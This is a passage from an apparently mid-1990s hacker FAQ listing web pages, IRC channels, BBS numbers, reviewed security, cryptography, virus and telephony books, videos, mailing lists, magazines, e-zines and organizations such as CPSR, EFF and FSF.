  5336.   www.tufts.edu/~jpagano/
  5337. N www.uccs.edu/~abusby/hpawebsites.html
  5338. N www.uccs.edu/~abusby/k0p.html                 (kn0wledge phreak)
  5339.   www.uci.agh.edu.pl/pub/security               (Security)
  5340. N www.uknet.net/pnc                             (The Personal Number Company)
  5341.   www.umcc.umich.edu/~doug/virus-faq.html       (Virus)
  5342. N www.underground.org                           (underground.org)
  5343. N www.underground.org/bugs/
  5344.   www.usfca.edu/crackdown/crack.html            (Hacker Crackdown)
  5345. N www.vodafone.co.uk                            (Vodafone)
  5346. N www.vptt.ch/natel.html                        (Natel)
  5347. U www.wam.umd.edu/~ankh/public/devil_does_unix
  5348. N www.warwick.ac.uk/WWW/search/Phones/nng.html  (National Number Group Codes)
  5349. N www.well.com/user/abacard
  5350. N www.well.com/user/crunch                      (Captain Crunch)
  5351. N www.wfu.edu/~wilsonbd
  5352.   www.wiltel.com                                (Wiltel)
  5353. N www.wiltel.com/glossary/glossary.html         (Telecommunications Glossary)
  5354. N www.wired.com                                 (HotWired)
  5355. N www2.undernet.org:8080/~cs93jtl/IRC.html      (IRC)
  5356.  
  5357. In addition to browsing these fine pages, you can often find what you
  5358. are looking for by using one of these automated search engines:
  5359.  
  5360.   www.yahoo.com
  5361.   www.lycos.com
  5362.   www.webcrawler.com
  5363.  
  5364.  
  5365. 07. What are some IRC channels of interest to hackers?
  5366.  
  5367.   #2600
  5368.   #cellular
  5369.   #hack
  5370.   #phreak
  5371.   #linux
  5372.   #realhack
  5373.   #root
  5374.   #unix
  5375.   #warez
  5376.  
  5377.  
  5378. 08. What are some BBS's of interest to hackers?
  5379.  
  5380.   Rune Stone                    (203)832-8441   NUP: Cyberdeck
  5381.   The Truth Sayer's Domain      (210)493-9975
  5382.   Hacker's Haven                (303)343-4053
  5383.   Independent Nation            (413)573-1809
  5384.   Ut0PiA                        (315)656-5135
  5385.   underworld_1994.com           (514)683-1894
  5386.   Alliance Communications       (612)251-8596
  5387.   Maas-Neotek                   (617)855-2923
  5388.   Apocalypse 2000               (708)676-9855
  5389.   K0dE Ab0dE                    (713)579-2276
  5390.   fARM R0Ad 666                 (713)855-0261
  5391.   kn0wledge Phreak <k0p> BBS    (719)578-8288   NUP=NO NUP
  5392. N The Edge of Reality           (805)496-7460
  5393.   Static Line                   (806)747-0802
  5394.   Area 51                       (908)526-4384
  5395. N The Drunk Forces              +972-3-5733477
  5396.  
  5397.  
  5398. 09. What are some books of interest to hackers?
  5399.  
  5400. General Computer Security
  5401. ~~~~~~~~~~~~~~~~~~~~~~~~~
  5402.   Computer Security Basics
  5403.   Author: Deborah Russell and G.T. Gengemi Sr.
  5404.   Publisher: O'Reilly & Associates, Inc.
  5405.   Copyright Date: 1991
  5406.   ISBN: 0-937175-71-4
  5407.  
  5408.         This is an excellent book.  It gives a broad overview of
  5409.         computer security without sacrificing detail.  A must read for
  5410.         the beginning security expert.
  5411.  
  5412.   Information Systems Security
  5413.   Author: Philip Fites and Martin Kratz
  5414.   Publisher: Van Nostrad Reinhold
  5415.   Copyright Date: 1993
  5416.   ISBN: 0-442-00180-0
  5417.  
  5418.   Computer Related Risks
  5419.   Author: Peter G. Neumann
  5420.   Publisher: Addison-Wesley
  5421.   Copyright Date: 1995
  5422.   ISBN: 0-201-55805-X
  5423.  
  5424.   Computer Security Management
  5425.   Author: Karen Forcht
  5426.   Publisher: boyd & fraser publishing company
  5427.   Copyright Date: 1994
  5428.   ISBN: 0-87835-881-1
  5429.  
  5430.   The Stephen Cobb Complete Book of PC and LAN Security
  5431.   Author: Stephen Cobb
  5432.   Publisher: Windcrest Books
  5433.   Copyright Date: 1992
  5434.   ISBN: 0-8306-9280-0 (hardback) 0-8306-3280-8 (paperback)
  5435.  
  5436.   Security in Computing
  5437.   Author: Charles P. Pfleeger
  5438.   Publisher: Prentice Hall
  5439.   Copyright Date: 1989
  5440.   ISBN: 0-13-798943-1.
  5441.  
  5442.   Building a Secure Computer System
  5443.   Author: Morrie Gasser
  5444.   Publisher: Van Nostrand Reinhold Co., New York.
  5445.   Copyright Date:
  5446.   ISBN: 0-442-23022-2
  5447.  
  5448.   Modern Methods for Computer Security
  5449.   Author: Lance Hoffman
  5450.   Publisher: Prentice Hall
  5451.   Copyright Date: 1977
  5452.   ISBN:
  5453.  
  5454.   Windows NT 3.5 Guidelines for Security, Audit and Control
  5455.   Author:
  5456.   Publisher: Microsoft Press
  5457.   Copyright Date:
  5458.   ISBN: 1-55615-814-9
  5459.  
  5460.   Protection and Security on the Information Superhighway
  5461.   Author: Dr. Frederick B. Cohen)
  5462.   Publisher: John Wiley & Sons
  5463.   Copyright Date: 1995
  5464.   ISBN: 0-471-11389-1
  5465.  
  5466. N Commonsense Computer Security
  5467.   Author: Martin Smith
  5468.   Publisher: McGraw-Hill
  5469.   Copyright Date: 1993
  5470.   ISBN: 0-07-707805-5
  5471.  
  5472. N Combatting Computer Crime
  5473.   Author: Jerry Papke
  5474.   Publisher: McGraw-Hill, Inc. / Chantico Publishing Company, Inc.
  5475.   Copyright Date: 1992
  5476.   ISBN: 0-8306-7664-3
  5477.  
  5478. N Computer Crime: a Crimefighters Handbook
  5479.   Author: David Icove, Karl Seger and William VonStorch
  5480.   Publisher: O'Reilly & Associates
  5481.   Copyright Date: 1995
  5482.   ISBN: 1-56592-086-4
  5483.  
  5484.  
  5485. Unix System Security
  5486. ~~~~~~~~~~~~~~~~~~~~
  5487.   Practical Unix Security
  5488.   Author: Simson Garfinkel and Gene Spafford
  5489.   Publisher: O'Reilly & Associates, Inc.
  5490.   Copyright Date: 1991
  5491.   ISBN: 0-937175-72-2
  5492.  
  5493.   Firewalls and Internet Security
  5494.   Author: William Cheswick and Steven Bellovin
  5495.   Publisher: Addison Wesley
  5496.   Copyright Date: 1994
  5497.   ISBN: 0-201-63357-4
  5498.  
  5499.   Unix System Security
  5500.   Author: Rik Farrow
  5501.   Publisher: Addison Wesley
  5502.   Copyright Date: 1991
  5503.   ISBN: 0-201-57030-0
  5504.  
  5505.   Unix Security: A Practical Tutorial
  5506.   Author: N. Derek Arnold
  5507.   Publisher: McGraw Hill
  5508.   Copyright Date: 1993
  5509.   ISBN: 0-07-002560-6
  5510.  
  5511.   Unix System Security: A Guide for Users and Systems Administrators
  5512.   Author: David A. Curry
  5513.   Publisher: Addison-Wesley
  5514.   Copyright Date: 1992
  5515.   ISBN: 0-201-56327-4
  5516.  
  5517.   Unix System Security
  5518.   Author: Patrick H. Wood and Stephen G. Kochan
  5519.   Publisher: Hayden Books
  5520.   Copyright Date: 1985
  5521.   ISBN: 0-672-48494-3
  5522.  
  5523.   Unix Security for the Organization
  5524.   Author: Richard Bryant
  5525.   Publisher: Sams
  5526.   Copyright Date: 1994
  5527.   ISBN: 0-672-30571-2
  5528.  
  5529. N Building Internet Firewalls
  5530.   Author: D. Brent Chapman and Elizabeth D. Zwicky
  5531.   Publisher: O'Reilly and Associates, Inc.
  5532.   Copyright Date: 1995
  5533.   ISBN: 1-56592-124-0
  5534.  
  5535. N Unix System Security Essentials
  5536.   Author: Christopher Braun
  5537.   Publisher: Addison Wesley
  5538.   Copyright Date: 1995
  5539.   ISBN: 0-201-42775-3
  5540.  
  5541. N Internet Firewalls and Network Security
  5542.   Author: Karanjit S. Siyan and Chris Hare
  5543.   Publisher: New Riders Publishing
  5544.   Copyright Date: 1995
  5545.   ISBN: 1-56205-437-6
  5546.  
  5547.  
  5548. Network Security
  5549. ~~~~~~~~~~~~~~~~
  5550.   Network Security Secrets
  5551.   Author: David J. Stang and Sylvia Moon
  5552.   Publisher: IDG Books
  5553.   Copyright Date: 1993
  5554.   ISBN: 1-56884-021-7
  5555.  
  5556.         Not a total waste of paper, but definitely not worth the
  5557.         $49.95 purchase price.  The book is a rehash of previously
  5558.         published information.  The only secret we learn from reading
  5559.         the book is that Sylvia Moon is a younger woman madly in love
  5560.         with the older David Stang.
  5561.  
  5562.   Complete Lan Security and Control
  5563.   Author: Peter Davis
  5564.   Publisher: Windcrest / McGraw Hill
  5565.   Copyright Date: 1994
  5566.   ISBN: 0-8306-4548-9 and 0-8306-4549-7
  5567.  
  5568.   Network Security
  5569.   Author: Steven Shaffer and Alan Simon
  5570.   Publisher: AP Professional
  5571.   Copyright Date: 1994
  5572.   ISBN: 0-12-638010-4
  5573.  
  5574. N Network Security: How to Plan For It and How to Achieve It
  5575.   Author: Richard M. Baker
  5576.   Publisher: McGraw-Hill, Inc.
  5577.   Copyright Date:
  5578.   ISBN: 0-07-005141-0
  5579.  
  5580. N Network Security
  5581.   Author: Steven L. Shaffer and Alan R. Simon
  5582.   Publisher: Academic Press
  5583.   Copyright Date: 1994
  5584.   ISBN: 0-12-638010-4
  5585.  
  5586. N Network Security: Private Communications in a Public World
  5587.   Author: Charlie Kaufman, Radia Perlman and Mike Speciner
  5588.   Publisher: Prentice Hall
  5589.   Copyright Date: 1995
  5590.   ISBN: 0-13-061466-1
  5591.  
  5592. N Network and Internetwork Security: Principles and Practice
  5593.   Author: William Stallings
  5594.   Publisher: Prentice Hall
  5595.   Copyright Date: 1995
  5596.   ISBN: 0-02-415483-0
  5597.  
  5598. N Implementing Internet Security
  5599.   Author: William Stallings
  5600.   Publisher: New Rider Publishing
  5601.   Copyright Date: 1995
  5602.   ISBN: 1-56205-471-6
  5603.  
  5604. N Actually Useful Internet Security Techniques
  5605.   Author: Larry J. Hughes, Jr.
  5606.   Publisher: New Riders Publishing
  5607.   Copyright Date: 1995
  5608.   ISBN: 1-56205-508-9
  5609.  
  5610.  
  5611. Cryptology
  5612. ~~~~~~~~~~~~
  5613.   Applied Cryptography: Protocols, Algorithms, and Source Code in C
  5614.   Author: Bruce Schneier
  5615.   Publisher: John Wiley & Sons
  5616.   Copyright Date: 1994
  5617.   ISBN: 0-471-59756-2
  5618.  
  5619.         Bruce Schneier's book replaces all other texts on
  5620.         cryptography.  If you are interested in cryptography, this is
  5621.         a must read.  This may be the first and last book on
  5622.         cryptography you may ever need to buy.
  5623.  
  5624.   Cryptography and Data Security
  5625.   Author: Dorothy Denning
  5626.   Publisher: Addison-Wesley Publishing Co.
  5627.   Copyright Date: 1982
  5628.   ISBN: 0-201-10150-5
  5629.  
  5630.   Protect Your Privacy: A Guide for PGP Users
  5631.   Author: William Stallings
  5632.   Publisher: Prentice-Hall
  5633.   Copyright Date: 1994
  5634.   ISBN: 0-13-185596-4
  5635.  
  5636.   Codebreakers
  5637.   Author: Kahn
  5638.   Publisher: Simon and Schuster
  5639.   Copyright Date:
  5640.   ISBN:0-02-560460-0
  5641.  
  5642.   Codebreakers: The Inside Story of Bletchley Park
  5643.   Author: Francis Harry Hinsley and Alan Stripp
  5644.   Publisher: Oxford University Press,
  5645.   Copyright Date: 1993
  5646.   ISBN:0-19-285304-X
  5647.  
  5648.   Cryptanalysis, a study of ciphers and their solution
  5649.   Author: Gaines, Helen Fouche
  5650.   Publisher: Dover Publications
  5651.   Copyright Date: 1956
  5652.   ISBN:
  5653.  
  5654. N Computer Privacy Handbook
  5655.   Author: Andre' Bacard
  5656.   Publisher: Peachpit Press
  5657.   Copyright Date: 1995
  5658.   ISBN: 1-56609-171-3
  5659.  
  5660. N E-Mail Security with PGP and PEM
  5661.   Author: Bruce Schneier
  5662.   Publisher: John Wiley & Sons
  5663.   Copyright Date: 1995
  5664.   ISBN: 0-471-05318-X
  5665.  
  5666. N PGP: Pretty Good Privacy
  5667.   Author: Simson Garfinkel
  5668.   Publisher: O'Reilly & Associates, Inc.
  5669.   Copyright Date: 1995
  5670.   ISBN: 1-56592-098-8
  5671.  
  5672.  
  5673. Programmed Threats
  5674. ~~~~~~~~~~~~~~~~~~
  5675.   The Little Black Book of Computer Viruses
  5676.   Author: Mark Ludwig
  5677.   Publisher: American Eagle Publications
  5678.   Copyright Date: 1990
  5679.   ISBN: 0-929408-02-0
  5680.  
  5681. N The Giant Black Book of Computer Viruses
  5682.   Author: Mark Ludwig
  5683.   Publisher: American Eagle Publications
  5684.   Copyright Date: 1995
  5685.   ISBN:
  5686.  
  5687.   Computer Viruses, Artificial Life and Evolution
  5688.   Author: Mark Ludwig
  5689.   Publisher: American Eagle Publications
  5690.   Copyright Date: 1993
  5691.   ISBN: 0-929408-07-1
  5692.  
  5693.   Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
  5694.         Threats to Your System
  5695.   Author: John McAfee and Colin Haynes
  5696.   Publisher: St. Martin's Press
  5697.   Copyright Date: 1989
  5698.   ISBN: 0-312-03064-9 and 0-312-02889-X
  5699.  
  5700.   The Virus Creation Labs: A Journey Into the Underground
  5701.   Author: George Smith
  5702.   Publisher: American Eagle Publications
  5703.   Copyright Date: 1994
  5704.   ISBN: 0-929408-09-8
  5705.  
  5706. U A Short Course on Computer Viruses
  5707.   Author: Dr. Fred Cohen
  5708.   Publisher: John Wiley & Sons
  5709.   Copyright Date: 1994
  5710.   ISBN: 0-471-00769-2
  5711.  
  5712. N Robert Slade's Guide to Computer Viruses
  5713.   Author: Robert Slade
  5714.   Publisher: Springer-Verlag
  5715.   Copyright Date: 1994
  5716.   ISBN: 0-387-94311-0 / 3-540-94311-0
  5717.  
  5718.  
  5719. Telephony
  5720. ~~~~~~~~~
  5721.   Engineering and Operations in the Bell System
  5722.   Author: R.F. Rey
  5723.   Publisher: Bell Telephont Laboratories
  5724.   Copyright Date: 1983
  5725.   ISBN: 0-932764-04-5
  5726.  
  5727.         Although hopelessly out of date, this book remains *THE* book
  5728.         on telephony.  This book is 100% Bell, and is loved by phreaks
  5729.         the world over.
  5730.  
  5731.   Telephony: Today and Tomorrow
  5732.   Author: Dimitris N. Chorafas
  5733.   Publisher: Prentice-Hall
  5734.   Copyright Date: 1984
  5735.   ISBN: 0-13-902700-9
  5736.  
  5737.   The Telecommunications Fact Book and Illustrated Dictionary
  5738.   Author: Ahmed S. Khan
  5739.   Publisher: Delmar Publishers, Inc.
  5740.   Copyright Date: 1992
  5741.   ISBN: 0-8273-4615-8
  5742.  
  5743.         I find this dictionary to be an excellent reference book on
  5744.         telephony, and I recommend it to anyone with serious
  5745.         intentions in the field.
  5746.  
  5747.   Tandy/Radio Shack Cellular Hardware
  5748.   Author: Judas Gerard and Damien Thorn
  5749.   Publisher: Phoenix Rising Communications
  5750.   Copyright Date: 1994
  5751.   ISBN:
  5752.  
  5753.   The Phone Book
  5754.   Author: Carl Oppendahl
  5755.   Publisher: Consumer Reports
  5756.   Copyright Date:
  5757.   ISBN: 0-89043-364-x
  5758.  
  5759.         Listing of every cellular ID in the us, plus roaming ports,
  5760.         and info numbers for each carrier.
  5761.  
  5762.   Principles of Caller I.D.
  5763.   Author:
  5764.   Publisher: International MicroPower Corp.
  5765.   Copyright Date:
  5766.   ISBN:
  5767.  
  5768.  
  5769. Hacking History and Culture
  5770. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5771.   The Hacker Crackdown: Law and Disorder on the Electronic Frontier
  5772.   Author: Bruce Sterling
  5773.   Publisher: Bantam Books
  5774.   Copyright Date: 1982
  5775.   ISBN: 0-553-56370-X
  5776.  
  5777.         Bruce Sterling has recently released the book FREE to the net.
  5778.         The book is much easier to read in print form, and the
  5779.         paperback is only $5.99.  Either way you read it, you will be
  5780.         glad you did.  Mr. Sterling is an excellent science fiction
  5781.         author and has brought his talent with words to bear on the
  5782.         hacking culture.  A very enjoyable reading experience.
  5783.  
  5784.   Cyberpunk
  5785.   Author: Katie Hafner and John Markoff
  5786.   Publisher: Simon and Schuster
  5787.   Copyright Date: 1991
  5788.   ISBN: 0-671-77879-X
  5789.  
  5790.   The Cuckoo's Egg
  5791.   Author: Cliff Stoll
  5792.   Publisher: Simon and Schuster
  5793.   Copyright Date: 1989
  5794.   ISBN: 0-671-72688-9
  5795.  
  5796.   Hackers: Heroes of the Computer Revolution
  5797.   Author: Steven Levy
  5798.   Publisher: Doubleday
  5799.   Copyright Date: 1984
  5800.   ISBN: 0-440-13495-6
  5801.  
  5802.  
  5803. Unclassified
  5804. ~~~~~~~~~~~~
  5805.   The Hacker's Handbook
  5806.   Author: Hugo Cornwall
  5807.   Publisher: E. Arthur Brown Company
  5808.   Copyright Date:
  5809.   ISBN: 0-912579-06-4
  5810.  
  5811.   Secrets of a Super Hacker
  5812.   Author: The Knightmare
  5813.   Publisher: Loompanics
  5814.   Copyright Date: 1994
  5815.   ISBN: 1-55950-106-5
  5816.  
  5817.         The Knightmare is no super hacker.  There is little or no real
  5818.         information in this book.  The Knightmare gives useful advice
  5819.         like telling you not to dress up before going trashing.
  5820.         The Knightmare's best hack is fooling Loompanics into
  5821.         publishing this garbage.
  5822.  
  5823.   The Day The Phones Stopped
  5824.   Author: Leonard Lee
  5825.   Publisher: Primus / Donald I Fine, Inc.
  5826.   Copyright Date: 1992
  5827.   ISBN: 1-55611-286-6
  5828.  
  5829.         Total garbage.  Paranoid delusions of a lunatic.  Less factual
  5830.         data that an average issue of the Enquirer.
  5831.  
  5832.   Information Warfare
  5833.   Author: Winn Swartau
  5834.   Publisher: Thunder Mountain Press
  5835.   Copyright Date: 1994
  5836.   ISBN: 1-56025-080-1
  5837.  
  5838.   An Illustrated Guide to the Techniques and Equipment of Electronic Warfare
  5839.   Author: Doug Richardson
  5840.   Publisher: Salamander Press
  5841.   Copyright Date:
  5842.   ISBN: 0-668-06497-8
  5843.  
  5844.  
  5845. 10. What are some videos of interest to hackers?
  5846.  
  5847.   'Unauthorized Access' by Annaliza Savage
  5848.   $25 on VH S format in 38-min
  5849.   Savage Productions
  5850.   1803 Mission St., #406
  5851.   Santa Cruz, CA 95060
  5852.  
  5853.   Hacker's '95 - a Phon-E & R.F. Burns Production
  5854.   See the video Emmanuel Goldstein thought would have the Feds knocking
  5855.   at his door. Coverage of Summercon'95 Coverage of Defcon III The big Y
  5856.   fiasco at Summercon PMF (narc) interviews Emmanuel Goldstein & Eric
  5857.   BloodAxe. Trip to Area 51 and interview with Psyhospy Coverage of the
  5858.   Secret Service briefing on Operation Cyber Snare (recent cell busts)
  5859.   Talks on Crypto, HERF, the Feds, etc.  All information is presented
  5860.   for educational purposes only.  Not for sale to government or law
  5861.   enforcement organizations.  Running time aproximately 90 minutes.
  5862.   $25.00   NTSC VHS
  5863.   $35.00   PAL/Secam VHS
  5864.   Custom Video Productions
  5865.   (908)842-6378
  5866.   videocvp@ix.netcom.com
  5867.  
  5868.  
  5869. 11. What are some mailing lists of interest to hackers?
  5870.  
  5871.   Academic Firewalls
  5872.   Registration Address: Send a message to majordomo@greatcircle.com
  5873.                         containing the line "subscribe firewalls user@host"
  5874.  
  5875. N The Alert
  5876.   Registration Address: Send a message to request-alert@iss.net
  5877.                         containing the line "subscribe alert"
  5878.  
  5879.   Bugtraq
  5880.   Reflector Address:    bugtraq@fc.net
  5881.   Registration Address: bugtraq-request@fc.net
  5882.  
  5883.   Cert Tools
  5884.   Reflector Address:    cert-tools@cert.org
  5885.   Registration Address: cert-tools-request@cert.org
  5886.  
  5887.   Computers and Society
  5888.   Reflector Address:    Comp-Soc@limbo.intuitive.com
  5889.   Registration Address: taylor@limbo.intuitive.com
  5890.  
  5891.   Coordinated Feasibility Effort to Unravel State Data
  5892.   Reflector Address:    ldc-sw@cpsr.org
  5893.   Registration Address:
  5894.  
  5895.   CPSR Announcement List
  5896.   Reflector Address:    cpsr-announce@cpsr.org
  5897.   Registration Address:
  5898.  
  5899.   CPSR - Intellectual Property
  5900.   Reflector Address:    cpsr-int-prop@cpsr.org
  5901.   Registration Address:
  5902.  
  5903.   CPSR - Internet Library
  5904.   Reflector Address:    cpsr-library@cpsr.org
  5905.   Registration Address:
  5906.  
  5907. N Cypherpunks
  5908.   Registration Address: Send a message to majordomo@toad.com
  5909.                         containing the line "subscribe cypherpunks"
  5910.  
  5911.   DefCon Announcement List
  5912.   Registration Address: Send a message to majordomo@fc.net containing
  5913.                         the line "subscribe dc-announce"
  5914.  
  5915.   DefCon Chat List
  5916.   Registration Address: Send a message to majordomo@fc.net containing
  5917.                         the line "subscribe dc-stuff"
  5918.  
  5919. N Discount Long Distance Digest
  5920.   Registration Address: Send a message to: dld-request@webcom.com
  5921.                         containing the line "subscribe"
  5922.  
  5923.   Electronic Payment
  5924.   Registration Address: e-payment@cc.bellcore.com
  5925.  
  5926.   IDS (Intruder Detection Systems)
  5927.   Registration Address: Send a message to majordomo@wyrm.cc.uow.edu.au
  5928.                         containing the line "subscribe ids"
  5929.  
  5930. N Information Warfare
  5931.   Registration Address: E-mail iw@all.net with a request to be added.
  5932.  
  5933. N Linux-Alert
  5934.   Registration Address: majordomo@linux.nrao.edu
  5935.  
  5936. N Linux-Security
  5937.   Registration Address: majordomo@linux.nrao.edu
  5938.  
  5939.   Macintosh Security
  5940.   Reflector Address:    mac-security@eclectic.com
  5941.   Registration Address: mac-security-request@eclectic.com
  5942.  
  5943.   NeXT Managers
  5944.   Registration Address: next-managers-request@stolaf.edu
  5945.  
  5946.   PGP3 announcement list
  5947.   Registration Address: pgp-announce-request@lsd.com
  5948.                         Subject: Your Name <user@host>
  5949.                         Body: *ignored*
  5950.  
  5951.   Phiber-Scream
  5952.   Registration Address: Send a message to listserv@netcom.com
  5953.                         containing the line "subscribe phiber-scream user@host"
  5954.  
  5955.   phruwt-l (Macintosh H/P)
  5956.   Registration Address: Send a message to filbert@netcom.com
  5957.                         with the subject "phruwt-l"
  5958.  
  5959.   rfc931-users
  5960.   Reflector Address:    rfc931-users@kramden.acf.nyu.edu
  5961.   Registration Address: brnstnd@nyu.edu
  5962.  
  5963.   RSA Users
  5964.   Reflector Address:    rsaref-users@rsa.com
  5965.   Registration Address: rsaref-users-request@rsa.com
  5966.  
  5967.   WWW Security
  5968.   Registration Address: www-security@ns2.rutgers.edu
  5969.  
  5970.  
  5971. 12. What are some print magazines of interest to hackers?
  5972.  
  5973. 2600 - The Hacker Quarterly
  5974. ~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5975. E-mail addresses: info@2600.com - to get info on 2600
  5976.                   index@2600.com - to get a copy of our index
  5977.                   meetings@2600.com - for info on starting your own meeting
  5978.                   subs@2600.com -- for subscription problems
  5979.                   letters@2600.com -- to send us a letter
  5980.                   articles@2600.com -- to send us an article
  5981.                   2600@2600.com -- to send us a general message
  5982.  
  5983. Subscription Address: 2600 Subscription Dept
  5984.                       PO Box 752
  5985.                       Middle Island, NY  11953-0752
  5986.  
  5987. Letters and article submission address: 2600 Editorial Dept
  5988.                                         PO Box 99
  5989.                                         Middle Island, NY  11953-0099
  5990.  
  5991. Phone Number: (516)751-2600
  5992. Fax Number: (516)474-2677
  5993. Voice BBS: (516)473-2626
  5994.  
  5995. Subscriptions: United States: $21/yr individual, $50 corporate.
  5996.                Overseas: $30/yr individual, $65 corporate.
  5997.  
  5998.  
  5999. Gray Areas
  6000. ~~~~~~~~~~
  6001. Gray Areas examines gray areas of law and morality and subject matter
  6002. which is illegal, immoral and/or controversial. Gray Areas explores
  6003. why hackers hack and puts hacking into a sociological framework of
  6004. deviant behavior.
  6005.  
  6006. E-Mail Address: grayarea@well.sf.ca.us
  6007. E-Mail Address: grayarea@netaxs.com
  6008.  
  6009. U.S. Mail Address: Gray Areas
  6010.                    PO Box 808
  6011.                    Broomall, PA 19008
  6012.  
  6013. Subscriptions: $26.00 4 issues first class
  6014.                $34.00 4 issues foreign (shipped air mail)
  6015.  
  6016.  
  6017. Privacy Newsletter
  6018. ~~~~~~~~~~~~~~~~~~
  6019. Privacy Newsletter is a monthly newsletter devoted to showing
  6020. consumers how to get privacy and keep it.
  6021.  
  6022. E-Mail Address: privacy@interramp.com
  6023.  
  6024. Subscription Address: Privacy Newsletter
  6025.                       P.O. Box 8206
  6026.                       Philadelphia, PA 19101-8206
  6027.  
  6028.  
  6029. Subscriptions: $99/yr (US)  $149/yr (Overseas)
  6030.  
  6031.  
  6032. Wired
  6033. ~~~~~
  6034. Subscription Address: subscriptions@wired.com
  6035.                   or: Wired
  6036.                       PO Box 191826
  6037.                       San Francisco, CA 94119-9866
  6038.  
  6039. Letters and article submission address: guidelines@wired.com
  6040.                                     or: Wired
  6041.                                         544 Second Street
  6042.                                         San Francisco, CA 94107-1427
  6043.  
  6044. Subscriptions: $39/yr (US) $64/yr (Canada/Mexico) $79/yr (Overseas)
  6045.  
  6046.  
  6047. Nuts & Volts
  6048. ~~~~~~~~~~~~
  6049. T& L Publications
  6050. 430 Princeland Court
  6051. Corona, CA 91719
  6052. (800)783-4624 (Voice) (Subscription Only Order Line)
  6053. (909)371-8497 (Voice)
  6054. (909)371-3052 (Fax)
  6055. CIS: 74262,3664
  6056.  
  6057.  
  6058. Cybertek: The Cyberpunk Technical Journal
  6059. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6060. P.O. Box 64
  6061. Brewster, NY 10509
  6062.  
  6063. Frequency: Bimonthly
  6064. Domestic Subscription Rate: $15/year (6 issues)
  6065.  
  6066.  
  6067. PrivateLine
  6068. ~~~~~~~~~~~
  6069. 5150 Fair Oaks Blvd. #101-348
  6070. Carmichael, CA 95608 USA
  6071.  
  6072. E-Mail: privateline@delphi.com
  6073.  
  6074. Subscriptions: $24 a year for six issues
  6075.  
  6076. Text of back issues are at the etext archive at Michigan.  Gopher over
  6077. or ftp to: etext.archive.umich.edu/pub/Zines/PrivateLine
  6078.  
  6079.  
  6080. 13. What are some e-zines of interest to hackers?
  6081.  
  6082. CoTNo: Communications of The New Order    ftp.etext.org  /pub/Zines/CoTNo
  6083. Empire Times                              ftp.etext.org  /pub/Zines/Emptimes
  6084. FEH                                       ftp.fc.net     /pub/defcon/FEH
  6085. The Infinity Concept                      infonexus.com
  6086.                                           /pub/Philes/Zines/TheInfinityConcept
  6087. Phrack                                    ftp.fc.net     /pub/phrack
  6088.  
  6089.  
  6090. 14. What are some organizations of interest to hackers?
  6091.  
  6092. Computer Professionals for Social Responsibility (CPSR)
  6093. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6094. CPSR empowers computer professionals and computer users to advocate for
  6095. the responsible use of information technology and empowers all who use
  6096. computer technology to participate in the public debate.   As technical
  6097. experts, CPSR members provide the public and policy makers with
  6098. realistic assessments of the power, promise, and limitations of computer
  6099. technology.  As an organization of concerned citizens, CPSR directs
  6100. public attention to critical choices concerning the applications of
  6101. computing and how those choices affect society.
  6102.  
  6103. By matching unimpeachable technical information with policy development
  6104. savvy, CPSR uses minimum dollars to have maximum impact and encourages
  6105. broad public participation in the shaping of technology policy.
  6106.  
  6107. Every project we undertake is based on five principles:
  6108.  
  6109. *  We foster and support public discussion of and public responsibility
  6110.    for decisions involving the use of computers in systems critical to
  6111.    society.
  6112.  
  6113. *  We work to dispel popular myths about the infallibility of
  6114.    technological systems.
  6115.  
  6116. *  We challenge the assumption that technology alone can solve political
  6117.    and social problems.
  6118.  
  6119. *  We critically examine social and technical issues within the computer
  6120.    profession, nationally and internationally.
  6121.  
  6122. *  We encourage the use of computer technology to improve the quality of
  6123.    life.
  6124.  
  6125. CPSR Membership Categories
  6126.   75  REGULAR MEMBER
  6127.   50  Basic member
  6128.  200  Supporting member
  6129.  500  Sponsoring member
  6130. 1000  Lifetime member
  6131.   20  Student/low income member
  6132.   50  Foreign subscriber
  6133.   50  Library/institutional subscriber
  6134.  
  6135. CPSR National Office
  6136. P.O. Box 717
  6137. Palo Alto, CA  94301
  6138. 415-322-3778
  6139. 415-322-3798 (FAX)
  6140. E-mail: cpsr@csli.stanford.edu
  6141.  
  6142.  
  6143. Electronic Frontier Foundation (EFF)
  6144. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6145. The Electronic Frontier Foundation (EFF) is dedicated to the pursuit
  6146. of policies and activities that will advance freedom and openness in
  6147. computer-based communications. It is a member-supported, nonprofit
  6148. group that grew from the conviction that a new public interest
  6149. organization was needed in the information age; that this organization
  6150. would enhance and protect the democratic potential of new computer
  6151. communications technology. From the beginning, the EFF determined to
  6152. become an organization that would combine technical, legal, and public
  6153. policy expertise, and would apply these skills to the myriad issues
  6154. and concerns that arise whenever a new communications medium is born.
  6155.  
  6156. Memberships are $20.00 per year for students, $40.00 per year for
  6157. regular members, and $100.00 per year for organizations.
  6158.  
  6159. The Electronic Frontier Foundation, Inc.
  6160. 1001 G Street, NW
  6161. Suite 950 East
  6162. Washington, D.C. 20001
  6163. (202)544 9237
  6164. (202)547 5481 FAX
  6165. Internet: eff@eff.org
  6166.  
  6167.  
  6168. Free Software Foundation (FSF) and GNU
  6169. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6170.  
  6171. The Free Software Foundation is dedicated to eliminating restrictions
  6172. on people's right to use, copy, modify, and redistribute computer
  6173. programs. We promote the development and use of free software in all
  6174. areas using computers.  Specifically, we are putting together a
  6175. complete, integrated software system named "GNU" ("GNU's Not Unix",
  6176. pronounced "guh-new") that will be upwardly compatible with Unix.
  6177. Most parts of this system are already being used and distributed.
  6178.  
  6179. The word "free" in our name refers to freedom, not price.  You may or
  6180. may not pay money to get GNU software, but regardless you have two
  6181. specific freedoms once you get it: first, the freedom to copy a
  6182. program and give it away to your friends and co-workers; and second,
  6183. the freedom to change a program as you wish, by having full access to
  6184. source code. You can study the source and learn how such programs are
  6185. written.  You may then be able to port it, improve it, and share your
  6186. changes with others.  If you redistribute GNU software you may charge
  6187. a distribution fee or give it away, so long as you include the source
  6188. code and the GPL (GNU General Public License).
  6189.  
  6190. Free Software Foundation, Inc.        Telephone: +1-617-876-3296
  6191. 673 Massachusetts Avenue              Fax: +1-617-492-9057
  6192. Cambridge, MA 02139-3309 USA          Fax (in Japan): 0031-13-2473 (KDD)
